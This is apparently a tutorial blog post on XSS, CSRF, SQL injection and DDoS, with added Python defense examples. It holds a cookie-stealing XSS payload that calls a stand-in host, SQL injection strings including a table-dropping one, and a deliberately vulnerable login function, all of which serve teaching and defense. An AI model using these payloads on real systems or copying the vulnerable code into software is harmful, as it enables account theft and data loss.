Common web attacks and defense
2022-07-25 11:28:00 【InfoQ】
- XSS (cross-site scripting)
- CSRF (cross-site request forgery)
- SQL injection
- DDoS
XSS
A typical payload steals the victim's cookie by sending it to a host the attacker controls:

```html
<script>window.open('www.xxx.com?param=' + document.cookie)</script>
```

Defenses:

- Mark important cookies as HttpOnly, so that `document.cookie` in JavaScript can no longer read them;
- Only accept the data you expect: for example, an age text box accepts only digits and everything else is filtered out;
- HTML-encode data before output, e.g. `<` becomes `&lt;` and `&` becomes `&amp;`;
- Filter or remove dangerous HTML tags such as `script` and `iframe`;
- Filter JavaScript event attributes such as `onclick=` and `onfocus=`.
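The following is an added example (not code from the original post) that puts the defenses above into working form: allow-list validation for a numeric field, HTML output encoding with the standard library, a deny-list check for the `script`/`iframe` tags and `on*=` handlers named above, and an `HttpOnly` cookie header. The payload string and the `render_comment` helper are constructed for the demonstration.

```python
import html
import re
from typing import Optional

# Constructed sample: the cookie-stealing payload discussed above (no live host).
PAYLOAD = "<script>window.open('www.xxx.com?param=' + document.cookie)</script>"


def encode_for_html(value: str) -> str:
    """Output encoding: '<' -> '&lt;', '&' -> '&amp;', quotes -> entities.
    The browser renders encoded text literally, so no script executes."""
    return html.escape(value, quote=True)


def validate_age(value: str) -> Optional[int]:
    """Input validation (allow-list): an age field accepts 1-3 digits, nothing else."""
    return int(value) if re.fullmatch(r"\d{1,3}", value) else None


# Deny-list checks for the tags and event attributes named in the text. They are
# useful for detection and logging; output encoding remains the primary defence.
_DANGEROUS_TAG = re.compile(r"<\s*/?\s*(script|iframe)\b", re.IGNORECASE)
_EVENT_ATTR = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def contains_dangerous_markup(value: str) -> bool:
    """True if the input carries a script/iframe tag or an inline on*= handler."""
    return bool(_DANGEROUS_TAG.search(value) or _EVENT_ATTR.search(value))


def set_cookie_header(name: str, value: str) -> str:
    """Session cookie flagged HttpOnly so document.cookie cannot read it."""
    return f"Set-Cookie: {name}={value}; HttpOnly; Secure; SameSite=Lax"


def render_comment(user_input: str) -> str:
    """Render untrusted input into a page fragment: always encode on output."""
    return f'<p class="comment">{encode_for_html(user_input)}</p>'


if __name__ == "__main__":
    print(render_comment(PAYLOAD))
    print("flagged:", contains_dangerous_markup(PAYLOAD))
    print(set_cookie_header("sid", "constructed-session-id"))
```

Output encoding is applied at render time rather than at input time, so the same stored value can be safely emitted into HTML regardless of where it came from; the deny-list regexes are deliberately kept as a detection signal, not as the thing that makes the page safe.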
CSRF

- Set cookies as HttpOnly so that JS cannot read the cookie contents, which prevents an attacker from forging the cookie.
- Do not rely on the cookie for verification; validate a token instead.
- Check the Referer header to verify that the request came from a trusted site.
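An added example (not from the original post) of the token and Referer checks listed above. HttpOnly keeps scripts from reading the session cookie, but the browser still attaches that cookie to every request on its own, so a state-changing endpoint must also demand proof that the request originated from our page: a token bound to the session via HMAC and carried in the form body, plus a Referer host check. `SECRET_KEY`, the `bank.example` host and the `handle_transfer` endpoint are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Iterable, Optional
from urllib.parse import urlparse

# Constructed: server-side secret, generated once per process for this example.
SECRET_KEY = secrets.token_bytes(32)


def _mac(session_id: str, nonce: str) -> str:
    """HMAC-SHA256 over session id and nonce, keyed with the server secret."""
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.HMAC(secret, session_id:nonce). It is bound to this session
    and is embedded in the page (hidden form field), never stored in a cookie."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id: str, token: Optional[str]) -> bool:
    """Recompute the MAC for the current session and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    return hmac.compare_digest(mac, _mac(session_id, nonce))


def referer_is_trusted(referer: Optional[str], trusted_hosts: Iterable[str]) -> bool:
    """Referer check: accept only when the referring host is exactly one of ours.
    A missing Referer is treated as untrusted for state-changing requests."""
    if not referer:
        return False
    return urlparse(referer).hostname in set(trusted_hosts)


def handle_transfer(form: dict, headers: dict, session_id: str) -> str:
    """Constructed state-changing endpoint: the session cookie alone is not enough."""
    if not referer_is_trusted(headers.get("Referer"), {"bank.example"}):
        return "403 untrusted referer"
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return "403 bad csrf token"
    return "200 transfer accepted"


if __name__ == "__main__":
    token = issue_csrf_token("sess-1")
    print(handle_transfer({"csrf_token": token},
                          {"Referer": "https://bank.example/form"}, "sess-1"))
    print(handle_transfer({}, {"Referer": "https://evil.example/"}, "sess-1"))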
SQL injection
`' or '1'='1` is the most common SQL injection. Suppose the user name entered is `jiajun` and the password entered is `' or '1'='1`. The check that was supposed to run is `select * from user where username='' and password=''`; after the parameters are spliced in, the statement actually executed is `select * from user where username='jiajun' and password='' or '1'='1'`. Because `'1'='1'` is always true, the verification is skipped.
- A more serious case: if the password entered is `';drop table user;--`, the SQL becomes `select * from user where username='jiajun' and password='';drop table user;--'`, which deletes the table outright.
- Escape or encode special characters (`'`, `"`, `\`, angle brackets, `&`, `*`, `;`, etc.) before they reach the database.
- Use a dedicated SQL injection scanner and fix the flaws it finds promptly; there are many open-source tools, for example sqlmap and SQLninja.
- Do not display SQL error messages (type errors, field mismatches, etc.) on the site. They expose the SQL statements in the code, and attackers use such messages to refine their injections.
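An added example (not code from the original post) that reproduces the splicing described above against a constructed in-memory SQLite table and shows the fix: parameterized queries, which let the driver handle the escaping of the special characters listed, plus a login wrapper that never returns the database error text to the client. Python's `sqlite3.execute` only accepts one statement at a time, so the `drop table` variant is not reproduced here; other drivers or query methods may well run it. The `user` table, its single account and the password value are constructed sample data.

```python
import sqlite3
from typing import Tuple


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory table with one account (sample data, not real).
    The password is stored in clear only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES ('jiajun', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The splicing from the text: user input becomes part of the SQL grammar,
    so a password of  ' or '1'='1  turns the WHERE clause into a tautology."""
    sql = f"select * from user where username='{username}' and password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders: values travel separately from the statement, so quotes,
    semicolons and comment markers stay data and are never parsed as SQL."""
    sql = "select * from user where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def login_with_safe_errors(conn: sqlite3.Connection, username: str, password: str) -> Tuple[bool, str]:
    """Same query, but database errors are logged server-side and the client
    only ever sees a generic message, never the SQL text or the driver error."""
    try:
        ok = login_parameterized(conn, username, password)
    except sqlite3.Error as exc:
        print(f"[server log] database error during login: {exc}")  # stays on the server
        return False, "Login failed"
    return ok, ("Welcome" if ok else "Login failed")


if __name__ == "__main__":
    db = setup_db()
    bypass = "' or '1'='1"
    print("spliced query, bypass payload :", login_vulnerable(db, "jiajun", bypass))
    print("parameterized, bypass payload :", login_parameterized(db, "jiajun", bypass))
    print("parameterized, real password  :", login_with_safe_errors(db, "jiajun", "correct-horse"))
```

The vulnerable function accepts the bypass payload for any user name, because the spliced clause ends in `or '1'='1'`; the parameterized version compares the literal string `' or '1'='1` against the stored password and rejects it.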
DDoS
- SYN flood. Briefly, the TCP three-way handshake works like this: the client sends the server a request to establish a connection (SYN), the server replies that the request is accepted (SYN-ACK), the client replies in turn (ACK), and the connection is established. An attacker forges the source IP address and sends the server a connection request; the server receives it and, following the handshake rules, replies. But the address is forged, so there is nobody to reply to: the second step fails and the third never completes. Because the server never receives the client's third-step message, it keeps repeating the second step. If the attacker sends requests from a large number of forged addresses, the server must maintain an enormous queue of half-open connections, which consumes its resources until it collapses.
- CC attack: an application-layer attack on the HTTP protocol that simulates normal users sending large numbers of requests until the site can no longer serve.
- DNS query flood: the attacker sends large numbers of queries for forged, invalid domain names to the target server; resolving them consumes the DNS server's resources, causing resolution timeouts and achieving the attack's goal.

Defenses:

- Increase bandwidth, although bandwidth is very expensive
- Scrub and filter abnormal traffic
- Filter unnecessary services and ports
- Use a high-defense, intelligent DNS resolution service
- Deploy a CDN
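An added example (not from the original post) for the CC attack described above, which is the one of the three that an application can detect and throttle itself. It scans constructed access-log lines with a sliding window to report clients whose request rate is far beyond normal browsing, and provides a small per-client rate limiter for online enforcement. The log format, the client addresses (taken from the documentation ranges 203.0.113.0/24 and 198.51.100.0/24) and the thresholds are all assumptions for the demonstration.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, List


def build_sample_log() -> List[str]:
    """Constructed access-log lines: '<client ip> <unix time> <method> <path>'.
    203.0.113.5 hammers /search, 198.51.100.7 browses at a normal pace."""
    lines = []
    for i in range(120):                        # 120 requests inside 10 seconds
        lines.append(f"203.0.113.5 {1000 + i // 12} GET /search?q={i}")
    for i in range(5):                          # 5 requests spread over 60 seconds
        lines.append(f"198.51.100.7 {1000 + i * 15} GET /index.html")
    return lines


def offending_ips(lines: List[str], window: int = 10, max_requests: int = 60) -> Dict[str, int]:
    """Offline detection: for each client, slide a window of `window` seconds over
    its request times and report the peak count when it exceeds max_requests."""
    times_by_ip: Dict[str, List[int]] = defaultdict(list)
    for line in lines:
        ip, ts, _method, _path = line.split(maxsplit=3)
        times_by_ip[ip].append(int(ts))
    flagged: Dict[str, int] = {}
    for ip, times in times_by_ip.items():
        recent: Deque[int] = deque()
        peak = 0
        for t in sorted(times):
            recent.append(t)
            while recent[0] <= t - window:      # drop requests older than the window
                recent.popleft()
            peak = max(peak, len(recent))
        if peak > max_requests:
            flagged[ip] = peak
    return flagged


class RateLimiter:
    """Online enforcement: allow at most max_requests per client per window."""

    def __init__(self, window: int, max_requests: int) -> None:
        self.window = window
        self.max_requests = max_requests
        self.hits: Dict[str, Deque[int]] = defaultdict(deque)

    def allow(self, ip: str, now: int) -> bool:
        recent = self.hits[ip]
        while recent and recent[0] <= now - self.window:
            recent.popleft()
        if len(recent) >= self.max_requests:
            return False                        # over budget: reject (e.g. HTTP 429)
        recent.append(now)
        return True


if __name__ == "__main__":
    print("clients over threshold:", offending_ips(build_sample_log()))
    limiter = RateLimiter(window=10, max_requests=3)
    print([limiter.allow("203.0.113.5", t) for t in (0, 1, 2, 3, 11)])
```

Per-client limits of this kind only help against floods that arrive from a manageable number of sources; a distributed CC attack spread thinly over many addresses still has to be absorbed upstream, which is where the traffic scrubbing and CDN items in the list above come in.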
summary